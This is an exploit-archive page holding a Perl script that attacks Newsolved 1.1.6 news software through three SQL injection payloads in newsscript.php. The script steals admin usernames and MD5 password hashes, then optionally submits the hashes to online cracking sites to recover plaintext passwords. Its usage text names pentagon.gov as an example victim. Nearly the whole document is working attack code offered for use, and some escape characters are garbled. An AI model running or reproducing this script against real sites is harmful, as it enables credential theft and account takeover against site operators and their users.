[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Newsolved 1.1.6 (login grabber) Multiple SQL Injection Exploit
# Published : 2009-06-29
# Author : jmp-esp
# Previous Title : Audio Article Directory (file) Remote File Disclosure Vulnerability
# Next Title : WordPress Plugin DM Albums 1.9.2 Remote File Inclusion Vuln
#!/usr/bin/perl -w
# Neversolved.pl
#
# Copyright (c) 2009 by <jmp-esp.net>
#
# A simple login grabber
# by lama - 06/23/2009
#
# Tested on: Newsolved 1.1.6
use strict;
use LWP::UserAgent;
use Getopt::Std;
use vars qw/ %opt /;
getopts( "i:p:u:lfh", %opt );
my @bugs =
(
[
"newsscript.php?m=archive&jahr=0'+UnIoN+SeLeCt+CoNcAt('1',':',user,':',pw)+FrOm+[PRE"
."FIX]_intern_users+WhErE+id='[USERID]&jahr_check=ok",
"monat_num=1:(.*?):([a-f0-9]{32})"
],
[
"newsscript.php?m=archive&topic_check=ok&idneu=-1'+UnIoN+SeLeCt+3,CoNcAt(user,':',pw"
."),1,4,1,5,9,2,6,5,3,5,8,9,7,9,3,2,3,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]",
"([^>]+):([a-f0-9]{32})<"
],
[
"newsscript.php?mailto=ok&newsid=-1'+UnIoN+SeLeCt+1,CoNcAt(user,':',pw),6,1,8,0,3,3,"
."9,8,8,7,4,9,8,9,4,8,4,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]",
"<i>(.*?):([a-f0-9]{32})</i>"
]
);
my @lookups =
(
[
'http://md5.rednoize.com/?q=[HASH]&s=md5&go=Search',
'',
'<div id="result" >(.*?)</div>'
],
[
'http://milw0rm.com/cracker/search.php',
'hash=[HASH]&Submit=Submit',
'>[a-f0-9]{32}</TD><TD align="middle" nowrap="nowrap" width=90>(.*?)</TD>'
],
[
'http://securitystats.com/tools/hashcrack.php',
'inputhash=[HASH]&type=MD5&Submit=Submit',
'<BR>[a-f0-9]{32} = (.*?)</td>'
],
[
'http://md5decrypter.com/index.php',
'hash=[HASH]&submit=Decrypt',
'<b class='red'>Normal Text: </b>(.*?)n'
]
);
sub isHost
{
my $target = shift;
if ( $target =~ /(?:http://)?([w.-_]*)(/.*)?/ )
{
my $host = $1;
my $folder = ( $2 ? $2 : '/' );
if ( $folder !~ //$/ )
{
$folder .= '/';
}
return "http://$host$folder";
}
else
{
return 0;
}
}
sub replacePlaceholder
{
my $search = shift;
my $replace = shift;
my $placeholder = shift;
$search=~s/[$placeholder]/$replace/g;
return $search;
}
sub isVulnerable
{
my $target = shift;
my $ua = LWP::UserAgent->new;
my $request = new HTTP::Request('GET', $target);
$request->header('User-Agent' => $opt{u});
my $response = $ua->request($request);
my $body = $response->content;
if ($body =~ /mysql_fetch_object/)
{
return 1;
}
elsif (!($body =~ /styles_output.css/))
{
return 0;
}
else
{
return -1;
}
}
sub getHash
{
my $target = shift;
my $regexp = shift;
my $ua = LWP::UserAgent->new;
my $request = new HTTP::Request('GET', $target);
$request->header('User-Agent' => $opt{u});
my $response = $ua->request($request);
my $body = $response->content;
if ($body =~ /$regexp/)
{
return ($1, $2);
}
else
{
return 0;
}
}
sub searchPlaintext
{
my $hash = shift;
foreach (@lookups)
{
my $server = replacePlaceholder(@$_[0], $hash, "HASH");
my $post = replacePlaceholder(@$_[1], $hash, "HASH");
my $ua = LWP::UserAgent->new;
my $request = new HTTP::Request('POST', $server);
$request->content("$post");
$request->content_type('application/x-www-form-urlencoded');
$request->header('Referer' => $server);
$request->header('User-Agent' => $opt{u});
my $response = $ua->request($request);
my $body = $response->content;
if ($body =~ /@$_[2]/)
{
return $1;
}
}
return 0;
}
sub attackTarget
{
my $target = shift;
my $userid = shift;
foreach (@bugs)
{
my $bug = @$_[0];
$bug = replacePlaceholder($bug, $userid, "USERID");
$bug = replacePlaceholder($bug, $opt{p}, "PREFIX");
(my $username, my $password) = getHash($target.$bug, @$_[1]);
if (($username) && ($password))
{
return ($username, $password);
}
}
return 0;
}
sub showHelp
{
print "Newsolved <= 1.1.6 Sploiter ( jmp-esp.net )n"
. "Usage: $0 [options] Victimn"
. "OPTIONSn"
. " -i integer: Userid [1]n"
. " -u string: Useragent [IE]n"
. " -p string: Prefix [newsolved]n"
. " -f: Force [optional]n"
. " -l: Lookup [optional]n"
. " -h: Help [optional]n"
. "EXAMPLESn"
. " ./$0 http://pentagon.gov/news/n"
. " ./$0 -f -i 4 http://omnomnom.com/n"
. "OTHERn"
. " Magic_Quotes_GPC needs to be offn";
}
sub showBanner
{
print " __ n"
. " |__|.--------.-----.______.-----.-----.-----.n"
. " | || | _ |______| -__|__ --| _ |n"
. " | ||__|__|__| __| |_____|_____| __|n"
. "|___| |__| lama 06/23/2009 |__| n"
. "Kampfgeschrei!nn";
}
if ($opt{h})
{
showHelp();
exit;
}
my $victim = shift;
if (!($victim) || !($victim = isHost($victim)))
{
showHelp();
exit;
}
$opt{u} = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' if (!$opt{u});
$opt{i} = '1' if (!$opt{i});
$opt{p} = 'newsolved' if (!$opt{p});
if (scalar(@bugs) < 1)
{
print "Bugs or gtfo. Srsly.n";
exit;
}
my $vulnerability = isVulnerable($victim.$bugs[0][0]);
if ($vulnerability == 0)
{
print "This doesn't look like Newsolved. Read the help, now.nn";
showHelp();
exit if (!$opt{f});
}
elsif ($vulnerability == -1)
{
print "Magic_Quotes_Gpc seems to be on. Read the help, now.nn";
showHelp();
exit if (!$opt{f});
}
showBanner();
(my $username, my $password) = attackTarget($victim, $opt{i});
if ($username)
{
print "Target:tt".isHost($victim)." ( ID: ".$opt{i}." )n";
print "Username:t$usernamenPassword:t$passwordn";
if ($opt{l})
{
my $cleartext = searchPlaintext($password);
if ($cleartext)
{
print "Cleartext:t$cleartextn";
}
else
{
print "Cleartext:tNot foundn";
}
}
}
else
{
print "Unable to retrieve the password: Is the userid correct?n";
}
# www.Syue.com [2009-06-29]